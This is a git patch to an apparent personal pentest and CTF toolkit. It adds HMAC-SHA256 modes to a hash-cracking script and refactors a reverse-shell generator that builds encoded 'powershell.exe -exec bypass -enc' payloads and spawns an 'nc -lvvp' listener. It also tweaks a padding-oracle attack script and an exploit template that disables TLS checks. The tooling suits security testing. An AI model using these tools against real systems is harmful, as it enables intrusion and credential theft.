From 718aaa6f6c27f5479e8a7814623474f7d8bf023b Mon Sep 17 00:00:00 2001 From: Roman Hergenreder Date: Mon, 25 Oct 2021 17:25:49 +0200 Subject: [PATCH] Update --- crack_hash.py | 4 ++++ genRevShell.py | 5 ++++- padBuster.pl | 2 +- template.py | 30 ++++++++++++++---------------- 4 files changed, 23 insertions(+), 18 deletions(-) mode change 100644 => 100755 padBuster.pl diff --git a/crack_hash.py b/crack_hash.py index 05b16b5..e561a1f 100755 --- a/crack_hash.py +++ b/crack_hash.py @@ -33,6 +33,8 @@ class HashType(enum.Enum): RAW_SHA2_256 = 1400 SHA256_PASS_SALT = 1410 SHA256_SALT_PASS = 1420 + HMAC_SHA256_PASS = 1450 + HMAC_SHA256_SALT = 1460 RAW_SHA2_384 = 10800 RAW_SHA2_512 = 1700 SHA512_PASS_SALT = 1710 @@ -181,6 +183,8 @@ class Hash: if self.isSalted: self.type.append(HashType.SHA256_PASS_SALT) self.type.append(HashType.SHA256_SALT_PASS) + self.type.append(HashType.HMAC_SHA256_PASS) + self.type.append(HashType.HMAC_SHA256_SALT) else: self.type.append(HashType.RAW_SHA2_256) self.type.append(HashType.RAW_SHA3_256) diff --git a/genRevShell.py b/genRevShell.py index 519c12c..e5f836f 100755 --- a/genRevShell.py +++ b/genRevShell.py @@ -36,13 +36,16 @@ def generatePayload(type, local_address, port): payload_encoded = base64.b64encode(payload.encode("UTF-16LE")).decode() return f"powershell.exe -exec bypass -enc {payload_encoded}" +def spawn_listener(port): + pty.spawn(["nc", "-lvvp", str(port)]) + def triggerShell(func, port): def _wait_and_exec(): time.sleep(1.5) func() threading.Thread(target=_wait_and_exec).start() - pty.spawn(["nc", "-lvvp", str(port)]) + spawn_listener(port) if __name__ == "__main__": diff --git a/padBuster.pl b/padBuster.pl old mode 100644 new mode 100755 index 5be3e3d..1c9a575 --- a/padBuster.pl +++ b/padBuster.pl @@ -527,7 +527,7 @@ sub processBlock { my $continue = "y"; - if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) { + if (($error && $content !~ /$error/ && $location !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) { # This is for autoretry logic (only works on the first byte) if ($autoRetry == 1 && ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) { $hasHit++; diff --git a/template.py b/template.py index 1507594..085d52a 100755 --- a/template.py +++ b/template.py @@ -5,36 +5,34 @@ import sys def generateTemplate(baseUrl): template = """#!/usr/bin/env python +import os import sys import json import base64 import requests +import subprocess +import urllib.parse from bs4 import BeautifulSoup -from hackingscripts import util, fileserver +from hackingscripts import util, fileserver, genRevShell from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337" -USERNAME = "admin" -PASSWORD = "password" -def login(username, password): - session = requests.Session() - post_data = { "username": username, "password": password } - res = session.post(f"{BASE_URL}/login", data=post_data, allow_redirects=False) - if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home": - print("Login failed") - exit() - return session +def request(method, uri, **kwargs): + if not uri.startswith("/") and uri != "": + uri = "/" + uri -def exploit(session, payload): - # Template method to exploit an endpoint - pass + client = requests + if "session" in kwargs: + client = kwargs["session"] + del kwargs["session"] + + return client.request(method, BASE_URL + uri, verify=False, allow_redirects=False, **kwargs) if __name__ == "__main__": - session = login(USERNAME, PASSWORD) - exploit(session, "id") + pass """ % baseUrl return template